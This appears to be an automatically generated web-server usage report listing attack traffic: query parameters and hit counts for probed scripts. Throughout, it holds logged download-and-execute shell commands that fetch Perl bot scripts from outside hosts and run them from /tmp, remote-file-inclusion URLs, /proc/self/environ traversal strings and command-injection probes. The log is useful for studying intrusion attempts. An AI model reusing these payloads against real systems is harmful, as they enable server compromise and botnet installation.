cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	3
cd /tmp;wget http://www.freewebs.com/novoil/acs;curl -O http ://www.freewebs.com/novoil/acs ;perl acs; rm -rf acs; rm -r f acs	3
cd /tmp;rm start.txt;wget http://189.24.38.227/start.txt;fet ch http://189.24.38.227/start.txt;lwp-download http://189.24 .38.227/start.txt;curl -O http://189.24.38.227/start.txt;lyn x http://189.24.38.227/start.txt;perl start.txt;rm start.txt	3
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25 0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe rl start.txt;rm start.txt	3
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt	2
Parameter	list
Value	Accesses
1	10
OTHER:	1,409
Script	Total Accesses
/wusage/monthly/2010/12/01/	1,802
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
12	119
11	2
27	1
Parameter	Option
Value	Accesses
com_myblog	76
com_google	2
Parameter	amp;view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	4
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	217
..//..//..//..//..//..//..//..///proc/self/environ 00	192
../../../../../../../../../../../../../../../proc/self/envir on	127
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	68
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	37
//..//..//..//..//..//..//..//..///proc/self/environ 00	17
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n	15
../../../../../../../../../../..//proc/self/environ 00	12
../../../../../../../../../../../../../../..//proc/self/envi ron 00	9
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	8
Parameter	option
Value	Accesses
com_google	544
com_myblog	118
com_fabrik	41
com_rwcards	33
com_gcalendar	16
com_rokdownloads	5
com_product	4
com_rwcards/?custompluginfile[]=../../../../../../../../../. ./../../..//proc/self/environ 00	1
Parameter	task
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	44
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	31
..//..//..//..//..//..//..//..///proc/self/environ 00	25
../../../../../../../../../../../../../../../proc/self/envir on	10
../../../../../../../../../../../../../../..//proc/self/envi ron 00	9
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	3
Parameter	view
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ 00	6
rwcards	1
OTHER:	5
Script	Total Accesses
/wusage////	1,591
Parameters by Submitted Value
Parameter	CONFIG[main_path]
Value	Accesses
http://ourfathersworld.org/wp-content/themes/default/idxx.tx t??	4
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.candidography.com/zero/id1.txt??	2
http://lnx.mp3dmultimediastudio.it/demo/id1??	2
http://www.imoralro.com.br/forum/public/style_css/css_2/id1. txt???	2
http://fpappalardo.com/logs/baner.txt??	1
http://gumansin.com/id.txt??	1
Parameter	DOCUMEN_ROOT[PATH]
Value	Accesses
http://www.howtolisten.kr//parti/data/admin/auto1.txt???	2
Parameter	GALLERY_BASEDIR
Value	Accesses
http://musicadelibreria.net/footer??	1
Parameter	SERVER[DOCUMENT_ROOT]
Value	Accesses
http://www.iheard.us/language/pdf_fonts/id1.txt??	1
Parameter	_PHPLIB[libdir]
Value	Accesses
http://gbdata.co.uk/images/zd1.txt????	16
http://phamsight.com/docs/images/head??	10
http://antigua.granada.notariado.org//includes/id1.txt?	10
http://www.wvblazers.com//administrator/components/com_virtu emart/sql/other/c1.txt?	6
http://ourchat8.110mb.com/images/moncrot1.gif?	3
http://www.reducereuserecycle.com.au/core/id1.txt??	2
http://www.tourgaja.net/www/data/sc1??	2
http://www.semihow.com/sh/amboard/compile/default_basic/admi n/mydb.txt??	2
http://newtabe.110mb.com/identi.jpg?	2
http://www.howtolisten.kr/lct/exam3/81/auto1.txt????	2
Parameter	_SERVER[DOCUMENT_ROOT]
Value	Accesses
http://musicadelibreria.net/footer??	51
http://phamsight.com/docs/images/head??	36
http://alandar.net/www2/log1.txt?	25
\|echo "casper";echo "kae";\|	14
http://aboutav.com//id1.txt???	13
http://www.koreadefence.net/data/shirohige/zfxid.txt??	12
http://www.lifeuniv.com/tmp/copyright.txt??	12
http://www.bk21bnt.com/bbs//icon/private_name/id1.txt??	12
http://www.fileden.com/files/2009/3/30/2385100/pirates1.txt?	11
http://valdes.fileave.com/scan/kil-9/idxx.txt???	11
Parameter	_main.php?_server[DOCUMENT_ROOT]
Value	Accesses
http://crot99.webs.com/moncrot1.gif?	1
Parameter	_zb_path
Value	Accesses
http://www.princedent.com/bbs/set_up/1.txt????	10
http://www.corretoresdeseguros.com.br/estatisticas/id1???	9
http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?	9
http://www.whinercentral.com/modules/Neos_Chronos/modules/ma war.txt??????	4
http://kb27.co.kr/bbs///id1.txt??	4
http://alandar.net/www2/log1.txt?	4
http://www.solmae.co.kr///receipt/lib/_private/id1.txt?	4
http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??	4
http://www.telephone114.com/bbs/data/__zbSessionTMP/1.txt?	4
http://www.homesteadnazarene.org/id.gif?	3
Parameter	board_skin_path
Value	Accesses
http://musicadelibreria.net/footer??	5
OTHER:	1,262
Script	Total Accesses
/wusage/summary/cgi.html/administrator/components/com_extcal endar/admin_settings.php	1,587
Parameters by Submitted Value
Parameter	CONFIG_EXTADMIN_PATH]
Value	Accesses
http://www.fabiofotografo.com.br/js/var.txt??	21
Parameter	CONFIG_EXT[ADMIN_PATH
Value	Accesses
	1
Parameter	CONFIG_EXT[ADMIN_PATH]
Value	Accesses
http://dlnks.com/z/z/k.txt?	29
http://ownsirc.googlepages.com/botnet.txt?	29
http://invisionar.hostinggratisargentina.com/eth0?	28
http://usuarios.arnet.com.ar/adipasqua/http?	26
http://www.mta.cl/galeria2/galery.txt?	23
http://www.jungo8949.co.kr/tool25.txt?	23
http://208.74.174.183/brizola.txt?	20
http://www.dunakom.hu/userimages/id.txt?	19
http://usuarios.arnet.com.ar/larry123/exploit.txt?	19
http://www.santiagoonline.com.ar/readme.txt?	17
Parameter	cmd
Value	Accesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	15
uname -a; id	11
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm bn.txt;wget http://3sk3nt.by.ru/siemens.txt;fetch http://3sk3nt.by.ru/siemens.txt;lwp-download http://3sk3nt. by.ru/siemens.txt;curl -O http://3sk3nt.by.ru/siemens.txt;ly nx http://3sk3nt.by.ru/siemens.txt;perl siemens.txt	9
id	6
cd /tmp;rm crew.txt;wget http://eep.br/~gpereira/crew.txt;fe tch http://eep.br/~gpereira/crew.txt;lwp-download http://eep .br/~gpereira/crew.txt;curl -O http://eep.br/~gpereira/crew. txt;lynx http://eep.br/~gpereira/crew.txt;perl crew.txt	5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt	3
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16 2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn x http://189.6.162.125:8090/x.txt;perl x.txt	3
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	3
Parameter	config_ext[admin_path]
Value	Accesses
	1
Parameter	list
Value	Accesses
1	2
OTHER:	1,258
Script	Total Accesses
/wusage/weekly///	1,557
Parameters by Submitted Value
Parameter	CONFIG[path]
Value	Accesses
http://gumansin.com/pds/1.txt??	3
Parameter	DIR_PREFIX
Value	Accesses
http://www.town-classifieds.com/adpics/baner.txt???	2
Parameter	DOCUMENT_ROOT
Value	Accesses
http://dk.fileave.com/heheh.txt????	9
http://190.81.28.182/incaware/id1.txt??	4
Parameter	FORM[session_id]
Value	Accesses
1	3
Parameter	FORM[set]
Value	Accesses
1	3
Parameter	GLOBALS
Value	Accesses
	9
Parameter	INCLUDE_FOLDER
Value	Accesses
http://www.jjdd.co.kr/nalog/plug_in_config/pro//id1???	2
http://www.c21vox.tv/id1.txt??	1
http://surya1.fileave.com/id.txt??	1
http://nic.bupt.edu.cn/media/j1.txt??	1
Parameter	SERVER[DOCUMENT_ROOT]
Value	Accesses
http://www.kyokushin.hu/fx29id2.txt???	1
Parameter	_PHPLIB[libdir]
Value	Accesses
http://phamsight.com/docs/images/head??	41
http://www.howtolisten.kr/lct/lib/list/respon1.txt?	7
http://nic.bupt.edu.cn/media/j1.txt??	6
http://www.howtolisten.kr/sarangbi_bgm/id1.txt?	6
http://www.howtolisten.kr/lct/exam3/81/auto1.txt???	4
http://www.lovebyday.com/linux/Oid1.txt??	4
http://nic.bupt.edu.cn/media/j1.txt???	3
http://tkosin.onmam.com/data/id1.txt??	3
http://howtolisten.kr//sarangbi_bgm/id1.txt??	3
http://musicadelibreria.net/footer??	3
Parameter	_REQUEST
Value	Accesses
	9
OTHER:	1,429
Script	Total Accesses
/wusage/weekly/2010/12/26/	1,515
Parameters by Submitted Value
Parameter	Itemid
Value	Accesses
12	16
125	4
27	1
Parameter	Option
Value	Accesses
com_google	1
Parameter	amp;option
Value	Accesses
com_gcalendar	4
Parameter	amp;view
Value	Accesses
gcalendar//?option=com_gcalendar	4
Parameter	controller
Value	Accesses
..//..//..//..//..//..//..//..///proc/self/environ	171
..//..//..//..//..//..//..//..///proc/self/environ 00	143
../../../../../../../../../../../../../../../proc/self/envir on	118
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	91
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir on	56
../../../../../../../../../../../../../../../../../../../../ ../../../..//proc/self/environ 00	44
../../../../../../../../../../..//proc/self/environ 00	35
../../../../../../../../../../../../../../..//proc/self/envi ron	30
../../../../../../../../../../..//proc/self/environ 00	16
../../../../../../../../../../../../..//proc/self/environ 00	10
Parameter	option
Value	Accesses
com_google	652
com_fabrik	47
com_myblog	17
com_gcalendar	12
com_goole	10
com_xgallery	1
com_product	1
Parameter	task
Value	Accesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..// proc/self/environ	8
../../../../../../../../../../../../../../../proc/self/envi ron	5
../../../../../../../../../../../../../../../proc/self/envir on	2
..//..//..//..//..//..//..//..///proc/self/environ 00	2
OTHER:	14
Script	Total Accesses
/wusage/summary/cgi.html//help.php	1,498
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	14
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	14
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	10
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch http://71.41.190.203/sur0.txt;lwp-download http://71.41.190 .203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*	9
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	9
cd /tmp;rm bunda24.txt;wget http://www.octium.ru//language/b unda24.txt;fetch http://www.octium.ru//language/bunda24.txt; lwp-download http://www.octium.ru//language/bunda24.txt;curl -O http://www.octium.ru//language/bunda24.txt;lynx http://w ww.octium.ru//language/bunda24.txt;perl bunda24.txt;rm -rf * .txt	6
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi z.no-ip.info/botnet.txt;perl botnet.txt	5
Parameter	css_path
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	63
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat?	49
http://www.capsoir.com/images/TRA.txt?	26
http://www.neoncomanda.kit.net/tool25.dat?	25
http://usuarios.arnet.com.ar/adipasqua/http?	24
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat?	18
http://www.pucorp.t5.com.br/lp.txt?	17
http://cestari.angelfire.com/lol.txt?	14
http://aszer.republika.pl/cos..txt?	13
http://h1.ripway.com/DiegoVirus/pbot.txt?	13
Parameter	css_pathhttp://usuarios.arnet.com.ar/adrikrasnow/rfi/bla.txt ?
Value	Accesses
	2
Parameter	css_pathhttp://www.foto-web.info/phpformmail/injektion.txt?
Value	Accesses
	1
OTHER:	1,144
Script	Total Accesses
/wusage/summary/cgi.html//js/status_image.php	1,491
Parameters by Submitted Value
Parameter	base_url
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	46
http://ownsirc.googlepages.com/botnet.txt?	31
http://www.freewebs.com/yahwek/phpbot.txt?	28
http://www.oslutadores.com/?id=23530	28
	22
http://www.neoncomanda.kit.net/tool25.dat?	20
http://www.pucorp.t5.com.br/lp.txt?	18
http://yahwek.dll.googlepages.com/phpbot.txt?	15
http://lol123.fileave.com/script9.txt??	15
http://proxysx.t35.com/x0.txt?	14
Parameter	cmd
Value	Accesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	12
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	8
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	6
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
uname -a; id	5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http:// pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?	3
id	3
Parameter	list
Value	Accesses
1	1
OTHER:	1,189
Script	Total Accesses
/wusage/summary/cgi.html/components/com_sitemap/sitemap.xml. php	1,455
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
uname -a; id	10
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	9
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	5
id	4
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3 .ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt	3
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4 /srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt; lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http ://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf srz.txt*	3
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt; fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf *.txt	2
cd /tmp;wget http://www.flylink.psi.br/arquivos/..2/4556464; perl 4556464	2
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot 123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt; lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl - O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt	2
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet ch http://189.24.138.40/start.txt;lwp-download http://189.24 .138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn x http://189.24.138.40/start.txt;perl start.txt;rm start.txt	2
Parameter	list
Value	Accesses
1	9
Parameter	mosCoaney.com/wusage/summary/cgi.html/help.php?css_path
Value	Accesses
http://www.digownz.kit.net/pbot1.txt??	9
http://www.freewebs.com/t420/p.txt??	6
http://www.freewebs.com/h1h1h1/p.txt??	6
http://www.rj2009.kit.net/ddd.txt?	6
http://www.rj2008.kit.net/p.txt??	6
http://www.freewebs.com/playssonn/p.txt??	5
http://www.freewebs.com/b0mb4do1337/p.txt??	4
http://www.digownz.kit.net/pbot1.txt?	3
http://flaw.we.bs/a.txt?	3
http://www.rj2009.kit.net/p.txt?	2
Parameter	mosConfig_absolute_path
Value	Accesses
http://www.freewebs.com/sur00tseclan/httd.txt?	42
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt?	21
http://www.freewebs.com/sur00tsecurity/bot.txt?	16
http://usuarios.arnet.com.ar/larry123/http?	15
http://usuarios.arnet.com.ar/larry123/ka.txt?	15
http://usuarios.arnet.com.ar/larry123/exploit.txt?	14
http://ownsparaficar.googlepages.com/funfo.txt?	14
http://www.laila.jp/item_pics/d3rf/teste.txt???????????????? ?????????????	13
http://dark4ngel.hostinggratisargentina.com/http?	12
http://ownsirc.googlepages.com/botnet.txt?	12
Parameter	mosConfig_http://www.phanom.ac.th/msnlist/id.txt???
Value	Accesses
	1
Parameter	xroot
Value	Accesses
www.popcorn.de/cmd?	1
OTHER:	1,178
Script	Total Accesses
/wusage/summary/cgi.html//setup/header.php	1,453
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br /~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l ynx http://eep.br/~gpereira/but.txt;perl but.txt	11
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7 1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly nx http://201.37.71.117:8090/x.txt;perl x.txt	11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt ;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/ /azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet .txt	8
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	6
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no- ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p erl botnet.txt	6
uname -a; id	5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4 0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1 89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt	5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt; fetch http://www.killersofdragons.com/x.txt;lwp-download htt p://www.killersofdragons.com/x.txt;curl -O http://www.killer sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x. txt;perl x.txt	5
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f etch http://189.24.221.165:9090/sta.txt;lwp-download http:// 189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90 90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta. txt;rm sta.txt	3
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.101.97:9090/s1t2 a3r4t.txt;fetch http://189.24.101.97:9090/s1t2a3r4t.txt;lwp- download http://189.24.101.97:9090/s1t2a3r4t.txt;curl -O htt p://189.24.101.97:9090/s1t2a3r4t.txt;lynx http://189.24.101. 97:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt	3
Parameter	css_path
Value	Accesses
http://www.jungo8949.co.kr/tool25.txt?	45
http://ownsirc.googlepages.com/botnet.txt?	31
http://www.oslutadores.com/?id=23530	28
http://www.freewebs.com/yahwek/phpbot.txt?	28
	22
http://www.neoncomanda.kit.net/tool25.dat?	19
http://www.pucorp.t5.com.br/lp.txt?	18
http://yahwek.dll.googlepages.com/phpbot.txt?	16
http://lol123.fileave.com/script9.txt??	15
http://www.capsoir.com/images/TRA.txt?	14
Parameter	list
Value	Accesses
1	1
OTHER:	1,153
Script	Total Accesses
/wusage/weekly////	1,421
Parameters by Submitted Value
Parameter	CONFIG[main_path]
Value	Accesses
http://ourfathersworld.org/wp-content/themes/default/idxx.tx t??	4
Parameter	DOCUMENT_ROOT
Value	Accesses
http://www.candidography.com/zero/id1.txt??	2
http://www.imoralro.com.br/forum/public/style_css/css_2/id1. txt???	2
http://lnx.mp3dmultimediastudio.it/demo/id1??	1
http://gumansin.com/id.txt??	1
Parameter	DOCUMEN_ROOT[PATH]
Value	Accesses
http://www.howtolisten.kr//parti/data/admin/auto1.txt???	2
Parameter	GALLERY_BASEDIR
Value	Accesses
http://musicadelibreria.net/footer??	1
Parameter	SERVER[DOCUMENT_ROOT]
Value	Accesses
http://www.iheard.us/language/pdf_fonts/id1.txt??	1
Parameter	_PHPLIB[libdir]
Value	Accesses
http://gbdata.co.uk/images/zd1.txt????	16
http://phamsight.com/docs/images/head??	12
http://antigua.granada.notariado.org//includes/id1.txt?	5
http://ourchat8.110mb.com/images/moncrot1.gif?	3
http://www.howtolisten.kr/lct/exam3/81/auto1.txt????	2
http://www.tourgaja.net/www/data/sc1??	2
http://www.wvblazers.com//administrator/components/com_virtu emart/sql/other/c1.txt?	2
http://www.semihow.com/sh/amboard/compile/default_basic/admi n/mydb.txt??	2
http://micromania.co.kr////bbs//data/co_market/idshiro1????	1
http://www.ouk.co.kr//board/bbs/img/van1.txt?	1
Parameter	_SERVER[DOCUMENT_ROOT]
Value	Accesses
http://musicadelibreria.net/footer??	52
http://phamsight.com/docs/images/head??	37
http://alandar.net/www2/log1.txt?	25
\|echo "casper";echo "kae";\|	15
http://www.koreadefence.net/data/shirohige/zfxid.txt??	13
http://www.lifeuniv.com/tmp/copyright.txt??	12
http://www.bk21bnt.com/bbs//icon/private_name/id1.txt??	12
http://valdes.fileave.com/scan/kil-9/idxx.txt???	12
http://190.12.77.105:83/fx29id1.txt?	11
http://www.fileden.com/files/2009/3/30/2385100/pirates1.txt?	11
Parameter	_main.php?_server[DOCUMENT_ROOT]
Value	Accesses
http://crot99.webs.com/moncrot1.gif?	1
Parameter	_zb_path
Value	Accesses
http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?	11
http://210.205.6.168/~shop/zfxid1.txt?	6
http://www.corretoresdeseguros.com.br/estatisticas/id1???	6
http://www.telephone114.com/bbs/data/__zbSessionTMP/1.txt?	4
http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??	4
http://kb27.co.kr/bbs///id1.txt??	4
http://alandar.net/www2/log1.txt?	4
http://www.whinercentral.com/modules/Neos_Chronos/modules/ma war.txt??????	4
http://rsh.kiev.ua/images/idfx1.txt?	3
http://www.nexzani.com/common/idfx1.txt?	3
Parameter	board_skin_path
Value	Accesses
http://musicadelibreria.net/footer??	2
OTHER:	1,109
Script	Total Accesses
/wusage/summary/cgi.html//newspublish/include.php	1,404
Parameters by Submitted Value
Parameter	cmd
Value	Accesses
cd /tmp;rm -rf ownz;wget http://avastscript.kit.net/ownz.tx t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz .txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt	12
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net /bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http:// www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt	9
